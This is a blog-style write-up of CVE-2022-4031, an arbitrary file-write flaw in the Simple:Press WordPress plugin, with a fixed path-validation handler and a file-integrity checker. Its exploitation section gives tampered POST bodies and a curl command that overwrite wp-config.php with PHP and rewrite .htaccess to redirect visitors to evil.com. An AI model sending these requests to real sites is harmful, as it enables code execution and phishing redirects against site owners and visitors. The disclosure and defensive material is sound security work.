WordPress is everywhere, and so are plugins that extend its functionality. But with great power comes… well, sometimes glaring vulnerabilities. CVE-2022-4031 hits close to home for site owners who run the Simple:Press forums plugin. Today, let’s break down what this bug is, how it works, and how it can be exploited.

What Is CVE-2022-4031?

The Simple:Press plugin, up to and including version 6.8, doesn’t properly restrict which files can be read and modified through its own file editing feature. The problem is the file parameter: it selects *which* file gets edited, but the plugin never confines it to the directory the editor was built for, so the feature turns into an arbitrary file modification primitive. In other words, anyone holding an administrator (or comparably privileged) account, whether the legitimate admin or an attacker who has taken one over, can overwrite any file the web server process is allowed to write.

> This is an "arbitrary file modification" vulnerability, and while it requires high privileges, it blows a huge hole in server security if admin accounts are ever compromised.

Breaking Down the Vulnerability

Vulnerable Versions:  
Simple:Press plugin v6.8 and below

Vulnerable Functionality:  
The plugin’s admin page that exposes file editing. It accepts a file path as a request parameter and never validates that the path resolves to a location inside the intended directory.

Impact:  
A compromised administrator account can modify any file the web server user can write to, including WordPress core files, plugin code, wp-config.php, .htaccess, or other configuration files. Overwriting any PHP file that WordPress later loads turns this into code execution as the web server user.

How It Works (Technical Details)

Every plugin has some way for admins to manage settings or content. Simple:Press goes a step further and ships its own file editor for forum-related files (the request in this write-up targets a forum theme template, which is the kind of file the editor is meant for). It takes a request parameter, called file, that is supposed to pick *which* forum file to edit. Without a check that the chosen path stays inside that directory, it’s game over.

Here's a simplified example of what the vulnerable code looked like:

```php
// This is NOT actual code from Simple:Press, but approximates the issue.
// Note what is missing: no check that the path stays inside the plugin's
// theme directory (and, in this sketch, no capability or nonce check either).
if ( isset($_POST['file']) && isset($_POST['content']) ) {
    $file_to_edit = $_POST['file'];    // taken straight from the request
    $new_content  = $_POST['content'];
    file_put_contents($file_to_edit, $new_content); // DANGER: writes wherever the path points
}
```

> *The plugin trusts user input for the file path—danger!*

There’s no check that $file_to_edit resolves to a path inside a safe directory. An attacker can POST an absolute path such as /var/www/html/wp-config.php, or a relative one such as ../../../../some/other/file (resolved against the PHP process’s working directory), and the plugin overwrites that file with whatever content the attacker provides. Note that string filters alone don’t close this hole: a symlink inside the allowed directory that points outside it passes any check done on the raw string.
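Here is what a fixed handler should do, as an added example written for this post (it is not Simple:Press’s actual patch). The function names, the manage_options capability, the sp_edit_file nonce action and the theme directory layout are assumptions, and the code assumes PHP 8 for str_contains. The idea is to re-anchor the request under the intended directory, canonicalise it with realpath(), and only then compare the result against the base path:

```php
<?php
// Added example (not Simple:Press code): resolving a user-supplied "file"
// parameter safely before editing it. Function names are hypothetical.

declare(strict_types=1);

/**
 * Resolve $requested (the raw "file" parameter) to an absolute path and
 * return it only if it is an existing regular file inside $base_dir with an
 * allowed extension. Returns null on any failure.
 */
function sp_resolve_editable_file(string $base_dir, string $requested, array $allowed_ext = ['php', 'css', 'html']): ?string
{
    // Reject NUL bytes up front: PHP 8 filesystem calls throw on them, and
    // older versions silently truncate the path at the NUL.
    if ($requested === '' || str_contains($requested, "\0")) {
        return null;
    }

    // Canonicalise the allowed directory. The trailing separator stops
    // "/var/www/themes-evil" from matching a base of "/var/www/themes".
    $base = realpath($base_dir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    $base .= DIRECTORY_SEPARATOR;

    // Always anchor the lookup under the base dir, even when the client sends
    // an absolute path; realpath() then collapses "../" and follows symlinks.
    $candidate = realpath($base . ltrim($requested, '/\\'));
    if ($candidate === false) {
        return null; // does not exist: the editor only touches existing files
    }

    // The resolved path must still start with the base directory.
    if (strncmp($candidate, $base, strlen($base)) !== 0) {
        return null; // traversal or symlink escaped the directory
    }

    if (!is_file($candidate)) {
        return null;
    }

    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    return in_array($ext, $allowed_ext, true) ? $candidate : null;
}

/**
 * WordPress-side handler sketch: capability check, nonce check, then the
 * containment check above. Only meaningful when loaded inside WordPress.
 */
function sp_handle_file_save(string $theme_dir): void
{
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions');
    }
    check_admin_referer('sp_edit_file'); // CSRF protection (assumed nonce action)
    $target = sp_resolve_editable_file($theme_dir, (string) ($_POST['file'] ?? ''));
    if ($target === null) {
        wp_die('Invalid file');
    }
    file_put_contents($target, wp_unslash((string) ($_POST['content'] ?? '')));
}

// Stand-alone demo on a constructed temp directory (no WordPress needed).
if (PHP_SAPI === 'cli') {
    $tmp = sys_get_temp_dir() . '/sp-demo-' . getmypid();
    mkdir("$tmp/themes/default", 0700, true);
    file_put_contents("$tmp/themes/default/header.php", "<?php // template\n");
    file_put_contents("$tmp/wp-config.php", "<?php // secrets\n");
    symlink("$tmp/wp-config.php", "$tmp/themes/default/link.php");

    $cases = [
        'default/header.php',            // legitimate edit
        '../wp-config.php',              // classic traversal
        '/etc/passwd',                   // absolute path: re-anchored under base, then not found
        'default/link.php',              // symlink that escapes the theme dir
        "default/header.php\0.txt",      // NUL-byte trick
        'default/../default/header.php', // traversal that ends up inside: fine
    ];
    foreach ($cases as $c) {
        $r = sp_resolve_editable_file("$tmp/themes", $c);
        printf("%-32s => %s\n", addcslashes($c, "\0"), $r ?? 'REJECTED');
    }

    // Tidy up the constructed tree.
    foreach (["$tmp/themes/default/link.php", "$tmp/themes/default/header.php", "$tmp/wp-config.php"] as $f) {
        unlink($f);
    }
    rmdir("$tmp/themes/default"); rmdir("$tmp/themes"); rmdir($tmp);
}
```

Run it with php on the command line: only the first and last cases resolve to the header.php path; the traversal, absolute path, symlink and NUL-byte cases are rejected. Two design points matter here. First, the comparison is done on the realpath() output, not the raw string, which is what defeats symlinks and encoded traversal. Second, the check lives in the plugin: WordPress’s DISALLOW_FILE_EDIT constant only disables the core theme/plugin editor and does nothing for a plugin that calls file_put_contents() itself.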

Step-by-Step Exploitation

1. Get Logged In

Log in as an admin or hijack a session of a privileged user.

2. Find the File Editor Form

Navigate to the admin dashboard and open the Simple:Press file editor. The exact admin page slug depends on the plugin version; the path used in the examples below (wp-admin/admin.php?page=simplepress-file-editor) is illustrative, not the real one.

3. Intercept the Request

Use your browser’s developer tools or an intercepting proxy (like Burp Suite) to capture the POST request sent when you save a file.

You might see something like this:

```http
POST /wp-admin/admin.php?page=simplepress-file-editor HTTP/1.1
Host: victim-site.com
Cookie: wordpress_logged_in_xxx=xxx;
Content-Type: application/x-www-form-urlencoded

file=themes/default/header.php&content=Blah%20blah%20stuff
```

A real WordPress admin form usually carries extra fields as well (a nonce such as _wpnonce and an action value). Leave those untouched; only file and content need to change.

4. Tamper With the file Parameter

Change file to point at a sensitive file. The values are shown raw here for readability; URL-encode them in the actual request. For example:

```http
file=../../../../wp-config.php&content=<?php echo "pwned"; ?>
```

Or even:

```http
file=/var/www/html/.htaccess&content=Redirect 301 / http://evil.com
```

5. Send the Request

Hit "Send". If the server PHP process can write to the file, it’ll replace whatever was there with your arbitrary content.

Example in cURL:

```bash
# --data-urlencode handles the <, ?, / and space characters in the payload;
# -d with a hand-encoded body works too, but is easy to get wrong.
curl -b "wordpress_logged_in_xxx=xxx" \
     --data-urlencode "file=../../../../wp-config.php" \
     --data-urlencode "content=<?php phpinfo(); ?>" \
     "https://victim-site.com/wp-admin/admin.php?page=simplepress-file-editor"
```

curl switches to POST on its own when a body is given, so -X POST isn’t needed. If the original form carried a nonce field, pass it as another --data-urlencode argument.

What Can an Attacker Do?

- Drop PHP into wp-config.php, a plugin file, or a theme file and run code as the web server user
- Break security controls (security plugins, .htaccess rules, hardening settings in wp-config.php)
- Redirect visitors to phishing/malware via .htaccess

The write isn’t confined to the web root, only by what the web server user may write, so the attacker could also plant backdoors outside WordPress entirely, in places a WordPress-focused scan won’t look.

Who’s Vulnerable?

- Any WordPress site running Simple:Press v6.8 or below. The risk is highest where a high-privileged account could be compromised, or where several admins exist and not all of them are trusted with the server itself.

How to Protect Yourself

- Update: Upgrade Simple:Press to a version later than 6.8 (the affected range is up to and including 6.8), or remove the plugin if you don’t use it.
- Limit admin accounts: This bug needs a high-privilege account, so every administrator login is effectively a server-level credential. Keep the admin count small and give admin rights only to people you’d trust with shell access.
- Monitor: Check for unexpected file changes, especially in wp-config.php, .htaccess, and plugin directories. WP-CLI’s wp core verify-checksums and wp plugin verify-checksums --all compare core and WordPress.org-hosted plugins against published checksums; for files outside that coverage (wp-config.php, .htaccess, custom themes) you need your own baseline.
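The monitoring bullet above is the kind of thing that is easy to say and rarely done, so here is a minimal working version, as an added example that is not part of the original post or the Simple:Press project. It records a SHA-256 baseline of a WordPress tree on the first run and reports added, modified and removed files afterwards. The function names, the directory layout and the sample files are constructed for the demo:

```php
<?php
// Added example (not from the original post or the Simple:Press project):
// a minimal file-integrity check for a WordPress tree. The first run records
// a SHA-256 baseline; later runs report added, modified and removed files.
// Paths and the sample files below are constructed for the demo.

declare(strict_types=1);

/** Hash every regular file under $root; returns [relative path => sha256]. */
function sp_hash_tree(string $root): array
{
    $real = realpath($root);
    if ($real === false) {
        throw new RuntimeException("no such directory: $root");
    }
    $hashes = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($real, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $info) {
        if ($info->isFile()) {
            $rel = substr($info->getPathname(), strlen($real) + 1);
            $hashes[$rel] = hash_file('sha256', $info->getPathname());
        }
    }
    ksort($hashes);
    return $hashes;
}

/** Compare a stored baseline with a fresh scan. */
function sp_diff_hashes(array $baseline, array $current): array
{
    $modified = [];
    foreach (array_intersect_key($current, $baseline) as $path => $hash) {
        if ($hash !== $baseline[$path]) {
            $modified[] = $path;
        }
    }
    return [
        'added'    => array_keys(array_diff_key($current, $baseline)),
        'modified' => $modified,
        'removed'  => array_keys(array_diff_key($baseline, $current)),
    ];
}

/** Records a baseline on the first run, otherwise returns the drift. */
function sp_check_integrity(string $root, string $baseline_file): array
{
    $current = sp_hash_tree($root);
    if (!is_file($baseline_file)) {
        file_put_contents($baseline_file, json_encode($current, JSON_PRETTY_PRINT));
        return ['added' => [], 'modified' => [], 'removed' => []];
    }
    $baseline = json_decode((string) file_get_contents($baseline_file), true);
    return sp_diff_hashes($baseline, $current);
}

// Stand-alone demo on a constructed mini WordPress tree.
$tmp = sys_get_temp_dir() . '/sp-integrity-' . getmypid();
mkdir("$tmp/site/wp-content/plugins/simple-press", 0700, true);
file_put_contents("$tmp/site/wp-config.php", "<?php define('DB_PASSWORD', 'x');\n");
file_put_contents("$tmp/site/.htaccess", "RewriteEngine On\n");
file_put_contents("$tmp/site/wp-content/plugins/simple-press/sp-api.php", "<?php // plugin\n");

$baseline_path = "$tmp/baseline.json";       // keep this OUTSIDE the web root in real use
sp_check_integrity("$tmp/site", $baseline_path); // first run: records the baseline

// Simulate what an abused file editor leaves behind: a rewritten .htaccess
// and a new PHP file inside a plugin directory.
file_put_contents("$tmp/site/.htaccess", "Redirect 301 / http://evil.com\n");
file_put_contents("$tmp/site/wp-content/plugins/simple-press/backdoor.php", "<?php /* web shell */\n");

$drift = sp_check_integrity("$tmp/site", $baseline_path);
foreach ($drift as $kind => $files) {
    foreach ($files as $f) {
        echo strtoupper($kind), "\t", $f, "\n";
    }
}

// Clean up the constructed tree.
$walk = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($tmp, FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($walk as $p) {
    $p->isDir() ? rmdir($p->getPathname()) : unlink($p->getPathname());
}
rmdir($tmp);
```

On the demo tree it flags .htaccess as modified and wp-content/plugins/simple-press/backdoor.php as added. Two caveats for real use: take the baseline right after a clean install or update, and store it (and run the check) from somewhere the web server user cannot write, because an attacker with this bug can overwrite a baseline that lives inside the web root just as easily as wp-config.php.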

References & Further Reading

- Official Simple:Press Plugin Page
- WPScan Vulnerability Database: CVE-2022-4031
- NVD (National Vulnerability Database) Entry

Conclusion

CVE-2022-4031 is a good reminder: just because a plugin option is for “admins only” doesn’t mean you can skip secure coding practices. One compromised admin and your whole WordPress install, and possibly your server, could be owned, all because of a missing directory containment check.

Always canonicalise and contain file paths, and never trust user input, no matter who the user claims to be!

If you’re running Simple:Press, patch fast or remove admin tools you don’t use; your site’s life may depend on it.

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 18:34:00 UTC